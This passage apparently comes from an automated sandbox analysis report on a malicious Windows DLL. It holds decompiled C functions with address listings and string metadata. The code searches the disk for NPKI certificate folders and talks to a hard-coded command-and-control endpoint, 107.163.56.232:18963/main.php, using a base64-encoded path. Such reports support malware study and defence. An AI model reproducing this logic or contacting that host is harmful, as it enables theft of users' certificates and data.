            							}
            							__eflags = _v8;
            							if(__eflags == 0) {
            								goto L9;
            							}
            							E1000CBDC(_a8, _t75, _v8, _v16);
            							E1000CCA8(0, 0, _t70, _t74, _t75, _t77, __eflags, _t87, _v8);
            							L8:
            							_t80 = _t80 + 0x14;
            							goto L9;
            						}
            						_t85 = _v812 - 0x2e;
            						if(_v812 == 0x2e) {
            							goto L9;
            						}
            						E1000CBF7(_a8, _t75);
            						E10004630(_t70, _t85, _t87,  &_v276, _a8, _a12);
            						goto L8;
            						L9:
            						_push( &_v856);
            						_push(_v12);
            						_t59 = E100272CF(0, 0, _t70, _t74, _t75, _t77, _t85);
            						asm("clc");
            					} while (_t59 != 0);
            					0x10035c27(_t74, _v12);
            					return _t59;
            				}
            				return _t47;
            			}






























            0x10004630
            0x10004630
            0x1000463f
            0x10004648
            0x1000464e
            0x10004653
            0x10004655
            0x1000465d
            0x1000466e
            0x10004673
            0x1000467d
            0x10004684
            0x10004689
            0x1000468d
            0x10004690
            0x10004696
            0x10004697
            0x1000469b
            0x1000469c
            0x100046a2
            0x100046a8
            0x100046a8
            0x100046aa
            0x100046ac
            0x100046c3
            0x100046c9
            0x100046cc
            0x100046d1
            0x100046d4
            0x100046e2
            0x1000470d
            0x1000471c
            0x1000471f
            0x10004724
            0x10004727
            0x10004729
            0x00000000
            0x00000000
            0x1000472b
            0x1000472e
            0x00000000
            0x00000000
            0x1000473a
            0x10004742
            0x10004747
            0x10004747
            0x00000000
            0x10004747
            0x100046e4
            0x100046eb
            0x00000000
            0x00000000
            0x100046f1
            0x10004703
            0x00000000
            0x1000474a
            0x10004750
            0x10004751
            0x10004754
            0x10004759
            0x1000475a
            0x10004766
            0x00000000
            0x1000476b
            0x1000476f

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InitializeThunkwsprintf
            • String ID: %s\%s$.$\*.*
            • API String ID: 2324811901-2210278135
            • Opcode ID: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
            • Instruction ID: d326f81f7ac9fe77124f283db77ffe5160f1302aaf38353be2e3603f90d865f5
            • Opcode Fuzzy Hash: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
            • Instruction Fuzzy Hash: F0316FB6C0025CBAEF12DFA4CC45EDE7B7CEB09280F1104A6F618A6051DB319B989B51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 22%
            			E1000800C(void* __eax, char __ebx, void* __ecx, void* __edx, char* __edi, intOrPtr* __esi, void* __fp0) {
            				void* _t60;
            				int _t61;
            				intOrPtr* _t64;
            				intOrPtr* _t73;
            				intOrPtr _t75;
            				void* _t83;
            				void* _t91;
            				void* _t93;
            				intOrPtr _t98;
            				char _t102;
            				signed int _t106;
            				void* _t113;
            				void* _t119;
            				void* _t122;
            				void* _t130;
            				intOrPtr* _t131;
            				void* _t133;
            				void* _t134;
            				void* _t141;
            				char* _t147;
            
            				_t151 = __fp0;
            				_t132 = __esi;
            				_t123 = __edi;
            				_t122 = __edx;
            				_t103 = __ecx;
            				_t102 = __ebx;
            				 *((intOrPtr*)(__eax - 0x18))();
            				asm("cli");
            				_push("\\");
            				_push(_t133 - 0x294);
            				 *__esi();
            				_push(_t133 - 0x4ac);
            				_push(_t133 - 0x294);
            				 *__esi();
            				_t60 = _t133 - 0x4ac;
            				_push(_t60);
            				_push("NPKI");
            				_push(_t60);
            				_t61 = E100254F0(__ebx, __ecx, __edx, __edi, __esi);
            				if(_t61 != 0) {
            					_push(_t133 - 0x294);
            					L10007F4F(__edx);
            					_pop(_t103);
            				} else {
            					_t106 = 0x3f;
            					 *((char*)(_t133 - 0x5d8)) = __ebx;
            					memset(_t133 - 0x5d7, _t61, _t106 << 2);
            					asm("stosw");
            					asm("stosb");
            					_push(0x100165b0);
            					E10003EF4(_t133 - 0x5d8, "%s\\%s", _t133 - 0x294);
            					_push(_t133 - 0x5d8);
            					 *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) =  *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) + E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff;
            					_t73 =  *0x8e85700;
            					 *_t73 =  *_t73 + _t73;
            					 *((intOrPtr*)(_t133 - 0x10)) = _t73;
            					_t75 = E10004770(_t133 - 0x294, 0x850fc085, _t122, _t133 - 0x5d7 + _t106, __fp0, _t133 - 0x294, _t73, _t133 - 0x5d7 + _t106);
            					_push(0x1f);
            					 *((intOrPtr*)(_t133 - 0xc)) = _t75;
            					 *((char*)(_t133 - 0x90)) = _t102;
            					memset(_t133 - 0x8f, 0, 0x850fc085 << 2);
            					asm("stosw");
            					asm("stosb");
            					_push(0x1f);
            					 *((char*)(_t133 - 0x190)) = _t102;
            					memset(_t133 - 0x18f, 0, 0 << 2);
            					asm("stosw");
            					asm("stosb");
            					_t113 = 0x1f;
            					_t130 = _t133 - 0x10f;
            					 *((char*)(_t133 - 0x110)) = _t102;
            					memset(_t130, 0, 0 << 2);
            					_t131 = _t130 + _t113;
            					asm("stosw");
            					asm("stosb");
            					 *((intOrPtr*)(_t133 - 8)) = 0x50;
            					_t83 = E10005C4C(_t133 - 0x110, 0x80);
            					_t141 = _t134 + 0x1c - 1 + 0x3c;
            					if(_t83 == 0) {
            						_push( &M1001258F);
            					} else {
            						_push(_t133 - 0x109);
            					}
            					E1000CD0E(0, _t133 - 0x90);
            					0x1003775b();
            					_push(0x2f);
            					_push(_t133 - 0x90);
            					if( *_t131() != 0) {
            						 *((char*)( *_t131(_t133 - 0x90, 0x2f))) = _t102;
            					}
            					_t123 =  *_t131(_t133 - 0x90, 0x3a);
            					_pop(_t119);
            					if(_t123 != _t102) {
            						 *_t123 = _t102;
            						_t98 = E1000CD0E(_t119, _t133 - 0x190);
            						_t123 = _t123 + 1;
            						_t147 = _t123;
            						0x100354a4(_t122, _t123, _t133 - 0x90);
            						_t141 = _t141 + 0xc;
            						 *((intOrPtr*)(_t133 - 8)) = _t98;
            					}
            					_push( *((intOrPtr*)(_t133 - 0xc)));
            					_push( *((intOrPtr*)(_t133 - 0x10)));
            					_push( *((intOrPtr*)(_t133 - 8)));
            					_t91 = E10001000(_t119, _t147, _t151, "L2ltYWdlLnBocA==");
            					_pop(_t103);
            					_push(_t91);
            					_push(_t133 - 0x190);
            					_t93 = E10007E03(_t102, _t103, _t123, _t132, _t147, _t151);
            					_t134 = _t141 + 0x14;
            					_t148 = _t93;
            					if(_t93 != 0) {
            						_push(_t102);
            						_push(_t133 - 0x5d8);
            						E1002E0E4(_t103, _t122, _t123, _t132, _t148);
            						_pop(es);
            					}
            					 *0x10017b90 = 1;
            					Sleep(0xbb8);
            				}
            				_t64 = _t133 - 0x4d8;
            				0x10036154(_t122,  *((intOrPtr*)(_t133 - 4)), _t64);
            				 *((intOrPtr*)(_t133 + 0x15840fc0)) =  *((intOrPtr*)(_t133 + 0x15840fc0)) + _t64;
            				 *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) =  *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) + _t64 +  *_t64;
            			}























            0x1000800c
            0x1000800c
            0x1000800c
            0x1000800c
            0x1000800c
            0x1000800c
            0x10008010
            0x10008013
            0x1000801e
            0x10008023
            0x10008024
            0x1000802c
            0x10008033
            0x10008034
            0x10008036
            0x1000803c
            0x1000803d
            0x10008042
            0x10008043
            0x1000804c
            0x100081e9
            0x100081ea
            0x100081ef
            0x10008052
            0x1000805a
            0x1000805b
            0x10008061
            0x10008063
            0x10008065
            0x1000806c
            0x1000807e
            0x1000808c
            0x1000809c
            0x1000809e
            0x100080a4
            0x100080a7
            0x100080b2
            0x100080b7
            0x100080b9
            0x100080c5
            0x100080cb
            0x100080cd
            0x100080cf
            0x100080d0
            0x100080db
            0x100080e3
            0x100080e5
            0x100080e7
            0x100080e8
            0x100080eb
            0x100080f1
            0x100080f7
            0x100080f7
            0x100080f9
            0x100080fb
            0x10008108
            0x1000810f
            0x10008114
            0x10008119
            0x10008124
            0x1000811b
            0x10008121
            0x10008121
            0x10008130
            0x10008135
            0x10008143
            0x10008145
            0x1000814c
            0x1000815a
            0x1000815c
            0x10008168
            0x1000816d
            0x1000816e
            0x10008176
            0x10008180
            0x10008185
            0x10008185
            0x10008188
            0x1000818d
            0x10008190
            0x10008190
            0x10008193
            0x10008196
            0x10008199
            0x100081a1
            0x100081a6
            0x100081a7
            0x100081ae
            0x100081af
            0x100081b4
            0x100081b7
            0x100081b9
            0x100081c1
            0x100081c2
            0x100081c3
            0x100081c8
            0x100081c8
            0x100081ce
            0x100081d8
            0x100081d8
            0x10007fc8
            0x10007fd3
            0x10007fd7
            0x10007fdf

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: %s\%s$107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$NPKI
            • API String ID: 3472027048-2092272908
            • Opcode ID: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
            • Instruction ID: 0f1f9c0d47637e2dd1cb31eff19b899711e0bc4e543d466f80a7974f01d04c09
            • Opcode Fuzzy Hash: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
            • Instruction Fuzzy Hash: 9F51627680425DAEEB51D7B4DC45BEE7BBCFB08251F1404E6E648E6181EB709B888F11
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E1000C3AB(signed int* __ecx, void* __edx, void* __fp0, intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a19) {
            				signed int _v8;
            				char _v12;
            				char _v13;
            				char _v14;
            				char _v15;
            				char _v16;
            				char _v17;
            				char _v18;
            				char _v19;
            				char _v20;
            				char _v21;
            				char _v22;
            				char _v23;
            				char _v24;
            				signed char _v25;
            				char _v26;
            				char _v27;
            				char _v28;
            				signed int _v32;
            				char _v33;
            				char _v44;
            				char _v56;
            				signed int _v62;
            				signed int _v66;
            				signed char _v74;
            				char _v334;
            				char _v594;
            				signed int _v598;
            				char* _v602;
            				char* _v606;
            				char _v866;
            				intOrPtr _v870;
            				signed int _v874;
            				short _v876;
            				short _v878;
            				signed short _v880;
            				signed int _v884;
            				intOrPtr _v888;
            				intOrPtr _v892;
            				char _v896;
            				signed int _v900;
            				signed int _v904;
            				signed int _v908;
            				unsigned int _v912;
            				signed int _v914;
            				signed int _v916;
            				short _v918;
            				char _v920;
            				char _v1180;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				signed int _t185;
            				signed int _t186;
            				char _t193;
            				signed int _t198;
            				char _t207;
            				char _t209;
            				char _t214;
            				char _t216;
            				char _t218;
            				char _t221;
            				char _t223;
            				signed int _t231;
            				signed int _t233;
            				char _t240;
            				intOrPtr _t245;
            				signed int _t249;
            				intOrPtr _t251;
            				void* _t252;
            				signed int _t256;
            				signed int _t261;
            				signed int _t264;
            				signed int _t265;
            				signed int _t266;
            				signed int _t274;
            				signed int _t285;
            				signed int* _t286;
            				void* _t287;
            				signed int _t288;
            				signed int _t289;
            				void* _t292;
            				void* _t296;
            				void* _t297;
            				void* _t298;
            				void* _t299;
            				void* _t300;
            				void* _t301;
            				void* _t302;
            				void* _t303;
            				void* _t304;
            				signed int _t309;
            				signed int _t311;
            				void* _t323;
            				intOrPtr _t334;
            				signed int _t339;
            				void* _t340;
            				char* _t341;
            				signed int _t342;
            				intOrPtr _t343;
            				signed int* _t346;
            				void* _t347;
            				void* _t348;
            				void* _t349;
            				void* _t350;
            				void* _t354;
            
            				_t354 = __fp0;
            				_t323 = __edx;
            				_t290 = __ecx;
            				_t346 = __ecx;
            				if(__ecx[4] != 0) {
            					return 0x40000;
            				}
            				__eflags = __ecx[9];
            				if(__ecx[9] == 0) {
            					__eflags =  *__ecx;
            					_t334 = _a16;
            					_v32 = 0;
            					if( *__ecx != 0) {
            						__eflags = _t334 - 4;
            						if(_t334 != 4) {
            							_v32 = 0xc;
            						}
            					}
            					_push(_a4);
            					E1000CD0E(_t290,  &_v1180);
            					__eflags = _v1180;
            					_pop(_t292);
            					if(_v1180 == 0) {
            						L89:
            						return 0x10000;
            					}
            					_t185 =  &_v1180;
            					do {
            						__eflags =  *_t185 - 0x5c;
            						if( *_t185 == 0x5c) {
            							 *_t185 = 0x2f;
            						}
            						_t185 = _t185 + 1;
            						__eflags =  *_t185;
            					} while ( *_t185 != 0);
            					__eflags = _t334 - 4;
            					_a19 = _t334 == 4;
            					__eflags = _a19;
            					if(_a19 == 0) {
            						L15:
            						_t16 =  &_a7;
            						 *_t16 = _a7 & 0x00000000;
            						__eflags =  *_t16;
            						L16:
            						__eflags = _a19;
            						_v8 = 8;
            						if(__eflags != 0) {
            							L18:
            							_v8 = 0;
            							L19:
            							__eflags = _t334 - 2;
            							if(_t334 != 2) {
            								__eflags = _t334 - 1;
            								if(_t334 != 1) {
            									__eflags = _t334 - 3;
            									if(_t334 != 3) {
            										__eflags = _t334 - 4;
            										if(__eflags != 0) {
            											goto L89;
            										}
            										_t293 = _t346;
            										_t186 = E1000C0F9(0, _t346, _t323, _t334, __eflags);
            										L27:
            										__eflags = _t186;
            										if(_t186 != 0) {
            											L90:
            											return _t186;
            										}
            										_push(0x10017b9c);
            										_v62 = 0;
            										E1000CD0E(_t293,  &_v866);
            										_push( &_v1180);
            										E1000CD0E(_t293,  &_v594);
            										_push( &_v594);
            										_t193 = E1000CD02(_t293, _t346);
            										_t349 = _t348 + 0x14;
            										__eflags = _a7;
            										_v896 = _t193;
            										if(_a7 != 0) {
            											_push("/");
            											E1000CD08(_t293,  &_v594);
            											_t35 =  &_v896;
            											 *_t35 = _v896 + 1;
            											__eflags =  *_t35;
            											_pop(_t293);
            										}
            										_push(0x10017b9c);
            										E1000CD0E(_t293,  &_v334);
            										__eflags =  *_t346;
            										_v598 = 0;
            										_v884 = 0;
            										_v74 = 1;
            										_v66 = 0;
            										_v878 = 0;
            										_v920 = 0xb17;
            										_v918 = 0x14;
            										_v912 = _t346[0x18];
            										_v908 = 0;
            										_v916 = 8;
            										if( *_t346 != 0) {
            											__eflags = _a19;
            											if(_a19 == 0) {
            												_v916 = 9;
            											}
            										}
            										_v876 = _v916;
            										_t198 = _v8;
            										__eflags = _t198;
            										_v914 = _t198;
            										if(_t198 != 0) {
            											L36:
            											_v904 = 0;
            											goto L37;
            										} else {
            											_t274 = _t346[0x19];
            											__eflags = _t274;
            											if(_t274 < 0) {
            												goto L36;
            											}
            											_v904 = _t274 + _v32;
            											L37:
            											_v900 = _t346[0x19];
            											_v874 = _t346[0x11];
            											_v880 = _v880 & 0x00000000;
            											_v25 = _v25 & 0x00000000;
            											_v870 = _t346[5] + _t346[3];
            											_v606 =  &_v28;
            											_v602 =  &_v56;
            											_v23 = _t346[0x14];
            											_t296 = 8;
            											_v892 = 0x11;
            											_v888 = 9;
            											_v28 = 0x55;
            											_v27 = 0x54;
            											_v26 = 0xd;
            											_v24 = 7;
            											_t207 = E1000CEF0(_t346[0x14], _t296, _t346[0x15]);
            											_v22 = _t207;
            											_t297 = 0x10;
            											_t209 = E1000CEF0(_t346[0x14], _t297, _t346[0x15]);
            											_v21 = _t209;
            											_t298 = 0x18;
            											_v20 = E1000CEF0(_t346[0x14], _t298, _t346[0x15]);
            											_v19 = _t346[0x12];
            											_t299 = 8;
            											_t214 = E1000CEF0(_t346[0x12], _t299, _t346[0x13]);
            											_v18 = _t214;
            											_t300 = 0x10;
            											_t216 = E1000CEF0(_t346[0x12], _t300, _t346[0x13]);
            											_v17 = _t216;
            											_t301 = 0x18;
            											_t218 = E1000CEF0(_t346[0x12], _t301, _t346[0x13]);
            											_t285 = _t346[0x17];
            											_v16 = _t218;
            											_v15 = _t346[0x16];
            											_t302 = 8;
            											_t221 = E1000CEF0(_t346[0x16], _t302, _t285);
            											_v14 = _t221;
            											_t303 = 0x10;
            											_t223 = E1000CEF0(_t346[0x16], _t303, _t285);
            											_v13 = _t223;
            											_t304 = 0x18;
            											_t332 = _t285;
            											_v12 = E1000CEF0(_t346[0x16], _t304, _t285);
            											_t101 =  &_v28; // 0x55
            											_push(9);
            											_push( &_v56);
            											E1000CD50( &_v56, _t346);
            											_push(_t346);
            											_push(E1000BCE1);
            											 *((char*)(_v602 + 2)) = 5;
            											_push( &_v920);
            											_t231 = E1000AED1(_t304);
            											_t350 = _t349 + 0x18;
            											__eflags = _t231;
            											if(_t231 == 0) {
            												_t109 = _v896 + 0x1e; // 0x2f
            												_t233 = _v892 + _t109;
            												_t346[5] = _t346[5] + _t233;
            												__eflags = _t346[4];
            												if(_t346[4] == 0) {
            													_t339 =  *_t346;
            													_t286 =  &(_t346[0xa]);
            													__eflags = _t339;
            													 *_t286 = 0x12345678;
            													_t346[0xb] = 0x23456789;
            													_t346[0xc] = 0x34567890;
            													if(_t339 == 0) {
            														L44:
            														__eflags =  *0x10017fa4;
            														if( *0x10017fa4 == 0) {
            															0x10037ff5(_t233);
            															0x10031c8a();
            															 *_t286 =  *_t286 ^ 0xe85057f8;
            															asm("insd");
            															asm("pushad");
            															__eflags = _t233 +  *_t233;
            														}
            														_t340 = 0;
            														__eflags = 0;
            														do {
            															 *((char*)(_t347 + _t340 - 0x28)) = rand() >> 7;
            															_t340 = _t340 + 1;
            															__eflags = _t340 - 0xc;
            														} while (_t340 < 0xc);
            														_v33 = _v912 >> 8;
            														_t287 = 0;
            														__eflags = 0;
            														do {
            															_t341 = _t347 + _t287 - 0x28;
            															_t240 = E1000B8A2(__eflags,  &(_t346[0xa]),  *((intOrPtr*)(_t347 + _t287 - 0x28)));
            															_t287 = _t287 + 1;
            															__eflags = _t287 - 0xc;
            															 *_t341 = _t240;
            														} while (__eflags < 0);
            														_t288 = 0;
            														__eflags =  *_t346;
            														if( *_t346 == 0) {
            															L56:
            															__eflags = 0;
            															L57:
            															__eflags = _a19;
            															_t346[9] = 0;
            															if(_a19 != 0) {
            																_t342 = _v8;
            																_t346[0x20] = _t288;
            																L64:
            																_t346[9] = _t346[9] & 0x00000000;
            																E1000C233(_t346);
            																_t309 = _t346[0x20];
            																_t186 = _t346[4];
            																_t346[5] = _t346[5] + _t309;
            																__eflags = _t186;
            																if(_t186 != 0) {
            																	goto L90;
            																}
            																__eflags = _t288;
            																if(_t288 != 0) {
            																	L80:
            																	return 0x400;
            																}
            																_t333 = _t346[0x1b];
            																_t245 = _v32 + _t309;
            																_v908 = _t346[0x1b];
            																__eflags = _v904 - _t245;
            																_v904 = _t245;
            																_t310 = _t309 & 0xffffff00 | _v904 == _t245;
            																__eflags = _t346[6] - _t288;
            																_v900 = _t346[0x19];
            																if(_t346[6] == _t288) {
            																	L75:
            																	__eflags = _v914 - _t342;
            																	if(_v914 != _t342) {
            																		L78:
            																		return 0x4000000;
            																	}
            																	__eflags = _t342;
            																	if(_t342 != 0) {
            																		L79:
            																		_push(_t346);
            																		_push(E1000BCE1);
            																		_push( &_v920);
            																		_t249 = E1000B113(_t310);
            																		__eflags = _t249;
            																		if(_t249 == 0) {
            																			_t169 =  &(_t346[5]);
            																			 *_t169 = _t346[5] + 0x10;
            																			__eflags =  *_t169;
            																			_v916 = _v876;
            																			L82:
            																			_t186 = _t346[4];
            																			__eflags = _t186;
            																			if(__eflags != 0) {
            																				goto L90;
            																			}
            																			_t251 = E1000CCAE(_t186, _t288, _t310, _t333, _t342, _t346, _t347, __eflags, _t354, _v888);
            																			_push(_v888);
            																			_t343 = _t251;
            																			_push(_v602);
            																			_push(_t343);
            																			_t252 = E1000CD50(_t251, _t346);
            																			_v602 = _t343;
            																			_t289 = E1000CCAE(_t252, _t288, _t310, _t333, 0x35e, _t346, _t347, __eflags, _t354, 0x35e);
            																			_push(0x35e);
            																			_push( &_v920);
            																			_push(_t289);
            																			E1000CD50( &_v920, _t346);
            																			_t256 = _t346[0xf];
            																			__eflags = _t256;
            																			if(_t256 != 0) {
            																				while(1) {
            																					_t311 =  *(_t256 + 0x35a);
            																					__eflags = _t311;
            																					if(_t311 == 0) {
            																						break;
            																					}
            																					_t256 = _t311;
            																				}
            																				 *(_t256 + 0x35a) = _t289;
            																				L88:
            																				return 0;
            																			}
            																			_t346[0xf] = _t289;
            																			goto L88;
            																		}
            																		goto L80;
            																	}
            																	__eflags = _t310;
            																	if(_t310 != 0) {
            																		goto L79;
            																	}
            																	goto L78;
            																}
            																__eflags =  *_t346 - _t288;
            																if( *_t346 == _t288) {
            																	L69:
            																	__eflags = _v916 & 0x00000001;
            																	_v914 = _t342;
            																	if((_v916 & 0x00000001) == 0) {
            																		_t158 =  &_v916;
            																		 *_t158 = _v916 & 0x0000fff7;
            																		__eflags =  *_t158;
            																	}
            																	_t312 = _t346;
            																	_v876 = _v916;
            																	_t261 = E1000BDCB(_t346, _v870 - _t346[3]);
            																	__eflags = _t261;
            																	if(_t261 == 0) {
            																		L74:
            																		return 0x2000000;
            																	} else {
            																		_push(_t346);
            																		_push(E1000BCE1);
            																		_push( &_v920);
            																		_t264 = E1000AED1(_t312);
            																		__eflags = _t264;
            																		if(_t264 != 0) {
            																			goto L80;
            																		}
            																		_t310 = _t346;
            																		_t265 = E1000BDCB(_t346, _t346[5]);
            																		__eflags = _t265;
            																		if(_t265 != 0) {
            																			goto L82;
            																		}
            																		goto L74;
            																	}
            																}
            																__eflags = _a19 - _t288;
            																if(_a19 == _t288) {
            																	goto L75;
            																}
            																goto L69;
            															}
            															_t342 = _v8;
            															__eflags = _t342 - 8;
            															if(_t342 != 8) {
            																__eflags = _t342;
            																if(_t342 != 0) {
            																	goto L64;
            																}
            																_t266 = E1000C354(_t354);
            																L60:
            																_t288 = _t266;
            																goto L64;
            															}
            															_t266 = E1000C272(_t346, _t332, _t347, _t354,  &_v920);
            															goto L60;
            														}
            														__eflags = _a19;
            														if(_a19 == 0) {
            															E1000BCE1(_t346,  &_v44, 0xc);
            															_t350 = _t350 + 0xc;
            															_t128 =  &(_t346[5]);
            															 *_t128 = _t346[5] + 0xc;
            															__eflags =  *_t128;
            														}
            														__eflags =  *_t346 - _t288;
            														if( *_t346 == _t288) {
            															goto L56;
            														} else {
            															__eflags = _a19;
            															if(_a19 != 0) {
            																goto L56;
            															}
            															_push(1);
            															_pop(0);
            															goto L57;
            														}
            													} else {
            														goto L42;
            													}
            													while(1) {
            														L42:
            														_t233 =  *_t339;
            														__eflags = _t233;
            														if(_t233 == 0) {
            															goto L44;
            														}
            														_t233 = E1000B834(_t286, _t233);
            														_t339 = _t339 + 1;
            														__eflags = _t339;
            														if(_t339 != 0) {
            															continue;
            														}
            														goto L44;
            													}
            													goto L44;
            												}
            												E1000C233(_t346);
            												return _t346[4];
            											}
            											E1000C233(_t346);
            											goto L80;
            										}
            									}
            									_push(_a12);
            									_t293 = _t346;
            									_push(_a8);
            									_t186 = E1000C049(0, _t346, _t334);
            									goto L27;
            								}
            								_push(_a12);
            								_t293 = _t346;
            								_push(_a8);
            								_t186 = L1000BF37(_t185, _t346, _t323);
            								goto L27;
            							}
            							_t293 = _t346;
            							_t186 = E1000BEBF(_t346, _t323, _a8);
            							goto L27;
            						}
            						_t185 = E1000B8C7(_t292, __eflags,  &_v1180);
            						__eflags = _t185;
            						if(_t185 == 0) {
            							goto L19;
            						}
            						goto L18;
            					}
            					_push( &_v1180);
            					_t185 = E1000CD02(_t292, _t346);
            					__eflags =  *((char*)(_t347 + _t185 - 0x499)) - 0x2f;
            					_pop(_t292);
            					if( *((char*)(_t347 + _t185 - 0x499)) == 0x2f) {
            						goto L15;
            					}
            					_a7 = 1;
            					goto L16;
            				} else {
            					return 0x50000;
            				}
            			}














































































































            0x1000c3ab
            0x1000c3ab
            0x1000c3ab
            0x1000c3b6
            0x1000c3be
            0x00000000
            0x1000c3c0
            0x1000c3ca
            0x1000c3ce
            0x1000c3da
            0x1000c3dc
            0x1000c3df
            0x1000c3e2
            0x1000c3e4
            0x1000c3e7
            0x1000c3e9
            0x1000c3e9
            0x1000c3e7
            0x1000c3f0
            0x1000c3fa
            0x1000c3ff
            0x1000c407
            0x1000c408
            0x1000c9ab
            0x00000000
            0x1000c9ab
            0x1000c40e
            0x1000c414
            0x1000c414
            0x1000c417
            0x1000c419
            0x1000c419
            0x1000c41c
            0x1000c41d
            0x1000c41d
            0x1000c422
            0x1000c425
            0x1000c429
            0x1000c42d
            0x1000c44c
            0x1000c44c
            0x1000c44c
            0x1000c44c
            0x1000c450
            0x1000c450
            0x1000c454
            0x1000c45b
            0x1000c46e
            0x1000c46e
            0x1000c471
            0x1000c471
            0x1000c474
            0x1000c482
            0x1000c485
            0x1000c496
            0x1000c499
            0x1000c4aa
            0x1000c4ad
            0x00000000
            0x00000000
            0x1000c4b3
            0x1000c4b5
            0x1000c4ba
            0x1000c4ba
            0x1000c4bc
            0x1000c9b4
            0x1000c9b4
            0x1000c9b4
            0x1000c4cd
            0x1000c4cf
            0x1000c4d2
            0x1000c4dd
            0x1000c4e5
            0x1000c4f0
            0x1000c4f1
            0x1000c4f6
            0x1000c4f9
            0x1000c4fd
            0x1000c503
            0x1000c50b
            0x1000c511
            0x1000c516
            0x1000c516
            0x1000c516
            0x1000c51d
            0x1000c51d
            0x1000c524
            0x1000c526
            0x1000c52e
            0x1000c531
            0x1000c538
            0x1000c53e
            0x1000c545
            0x1000c548
            0x1000c54f
            0x1000c558
            0x1000c561
            0x1000c567
            0x1000c56d
            0x1000c576
            0x1000c578
            0x1000c57c
            0x1000c57e
            0x1000c57e
            0x1000c57c
            0x1000c58e
            0x1000c595
            0x1000c598
            0x1000c59a
            0x1000c5a1
            0x1000c5b7
            0x1000c5b7
            0x00000000
            0x1000c5a3
            0x1000c5a3
            0x1000c5a6
            0x1000c5a8
            0x00000000
            0x00000000
            0x1000c5af
            0x1000c5bd
            0x1000c5c3
            0x1000c5cc
            0x1000c5db
            0x1000c5e3
            0x1000c5e7
            0x1000c5f0
            0x1000c5f9
            0x1000c604
            0x1000c607
            0x1000c60c
            0x1000c616
            0x1000c620
            0x1000c624
            0x1000c628
            0x1000c62c
            0x1000c630
            0x1000c637
            0x1000c63a
            0x1000c63f
            0x1000c646
            0x1000c649
            0x1000c659
            0x1000c661
            0x1000c664
            0x1000c669
            0x1000c670
            0x1000c673
            0x1000c678
            0x1000c67f
            0x1000c682
            0x1000c687
            0x1000c68f
            0x1000c692
            0x1000c69a
            0x1000c69d
            0x1000c6a2
            0x1000c6a9
            0x1000c6ac
            0x1000c6b1
            0x1000c6b8
            0x1000c6bb
            0x1000c6be
            0x1000c6c5
            0x1000c6c8
            0x1000c6cb
            0x1000c6d1
            0x1000c6d2
            0x1000c6dd
            0x1000c6de
            0x1000c6e3
            0x1000c6ed
            0x1000c6ee
            0x1000c6f3
            0x1000c6f6
            0x1000c6f8
            0x1000c712
            0x1000c712
            0x1000c716
            0x1000c719
            0x1000c71d
            0x1000c72e
            0x1000c730
            0x1000c733
            0x1000c735
            0x1000c73b
            0x1000c742
            0x1000c749
            0x1000c75d
            0x1000c75d
            0x1000c764
            0x1000c767
            0x1000c76e
            0x1000c773
            0x1000c779
            0x1000c77a
            0x1000c77b
            0x1000c77d
            0x1000c77e
            0x1000c77e
            0x1000c780
            0x1000c789
            0x1000c78d
            0x1000c78e
            0x1000c78e
            0x1000c79c
            0x1000c79f
            0x1000c79f
            0x1000c7a1
            0x1000c7a5
            0x1000c7ae
            0x1000c7b3
            0x1000c7b5
            0x1000c7b9
            0x1000c7b9
            0x1000c7bd
            0x1000c7bf
            0x1000c7c1
            0x1000c7ea
            0x1000c7ea
            0x1000c7ec
            0x1000c7ec
            0x1000c7f0
            0x1000c7f3
            0x1000c81c
            0x1000c81f
            0x1000c825
            0x1000c825
            0x1000c82b
            0x1000c830
            0x1000c836
            0x1000c839
            0x1000c83c
            0x1000c83e
            0x00000000
            0x00000000
            0x1000c844
            0x1000c846
            0x1000c921
            0x00000000
            0x1000c921
